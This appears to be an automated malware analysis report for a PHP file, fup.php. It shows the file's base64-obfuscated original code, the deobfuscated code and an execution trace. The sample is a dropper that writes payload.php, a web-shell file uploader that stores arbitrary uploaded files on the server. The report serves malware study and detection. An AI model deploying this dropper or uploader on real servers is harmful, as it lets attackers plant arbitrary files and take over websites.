PHP Malware Analysis
fup.php
md5: d9cd93dd61731ef842a855a7240a2835
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Encoding
Files
- copy (Deobfuscated, Traces)
Input
- _FILES (Deobfuscated, Traces)
- _POST (Deobfuscated, Traces)
Deobfuscated PHP code
<?php
$x = fopen('payload.php', 'w');
fwrite($x, "<?php echo 'Uploader<br>';echo '<br>';echo '<form action=\"\" method=\"post\" enctype=\"multipart/form-data\" name=\"uploader\" id=\"uploader\">';echo '<input type=\"file\" name=\"file\" size=\"50\"><input name=\"_upl\" type=\"submit\" id=\"_upl\" value=\"Upload\"></form>';if( \$_POST['_upl'] == \"Upload\" ) {if(@copy(\$_FILES['file']['tmp_name'], \$_FILES['file']['name'])) { echo '<b>Upload !!!</b><br><br>'; }else { echo '<b>Upload !!!</b><br><br>'; }}?>");
fclose($x);Execution traces
data/traces/d9cd93dd61731ef842a855a7240a2835_trace-1676238627.7499.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 19:50:53.647815]
1 0 1 0.000232 393512
1 3 0 0.000295 394840 {main} 1 /var/www/html/uploads/fup.php 0 0
2 4 0 0.000312 394840 fopen 0 /var/www/html/uploads/fup.php 1 2 'payload.php' 'w'
2 4 1 0.000354 395480
2 4 R resource(4) of type (stream)
1 A /var/www/html/uploads/fup.php 1 $x = resource(4) of type (stream)
2 5 0 0.000390 395408 base64_decode 0 /var/www/html/uploads/fup.php 1 1 'PD9waHAgZWNobyAnVXBsb2FkZXI8YnI+JztlY2hvICc8YnI+JztlY2hvICc8Zm9ybSBhY3Rpb249IiIgbWV0aG9kPSJwb3N0IiBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIiBuYW1lPSJ1cGxvYWRlciIgaWQ9InVwbG9hZGVyIj4nO2VjaG8gJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI1MCI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT4nO2lmKCAkX1BPU1RbJ191cGwnXSA9PSAiVXBsb2FkIiApIHtpZihAY29weSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkgeyBlY2hvICc8Yj5VcGxvYWQgISEhPC9iPjxicj48YnI+Jzsg'
2 5 1 0.000425 396080
2 5 R '<?php echo \'Uploader<br>\';echo \'<br>\';echo \'<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">\';echo \'<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>\';if( $_POST[\'_upl\'] == "Upload" ) {if(@copy($_FILES[\'file\'][\'tmp_name\'], $_FILES[\'file\'][\'name\'])) { echo \'<b>Upload !!!</b><br><br>\'; }else { echo \'<b>Upload !!!</b><br><br>\'; }}?>'
2 6 0 0.000456 396048 fwrite 0 /var/www/html/uploads/fup.php 1 2 resource(4) of type (stream) '<?php echo \'Uploader<br>\';echo \'<br>\';echo \'<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">\';echo \'<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>\';if( $_POST[\'_upl\'] == "Upload" ) {if(@copy($_FILES[\'file\'][\'tmp_name\'], $_FILES[\'file\'][\'name\'])) { echo \'<b>Upload !!!</b><br><br>\'; }else { echo \'<b>Upload !!!</b><br><br>\'; }}?>'
2 6 1 0.000491 396112
2 6 R 430
2 7 0 0.000505 395408 fclose 0 /var/www/html/uploads/fup.php 1 1 resource(4) of type (stream)
2 7 1 0.000520 395008
2 7 R TRUE
1 3 1 0.000532 394976
0.000558 314256
TRACE END [2023-02-12 19:50:53.648183]
Generated HTML code
<html><head></head><body></body></html>Original PHP code
<?php $x = fopen('payload.php','w'); fwrite($x,base64_decode('PD9waHAgZWNobyAnVXBsb2FkZXI8YnI+JztlY2hvICc8YnI+JztlY2hvICc8Zm9ybSBhY3Rpb249IiIgbWV0aG9kPSJwb3N0IiBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIiBuYW1lPSJ1cGxvYWRlciIgaWQ9InVwbG9hZGVyIj4nO2VjaG8gJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI1MCI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT4nO2lmKCAkX1BPU1RbJ191cGwnXSA9PSAiVXBsb2FkIiApIHtpZihAY29weSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkgeyBlY2hvICc8Yj5VcGxvYWQgISEhPC9iPjxicj48YnI+JzsgfWVsc2UgeyBlY2hvICc8Yj5VcGxvYWQgISEhPC9iPjxicj48YnI+JzsgfX0/Pg==')); fclose($x);?>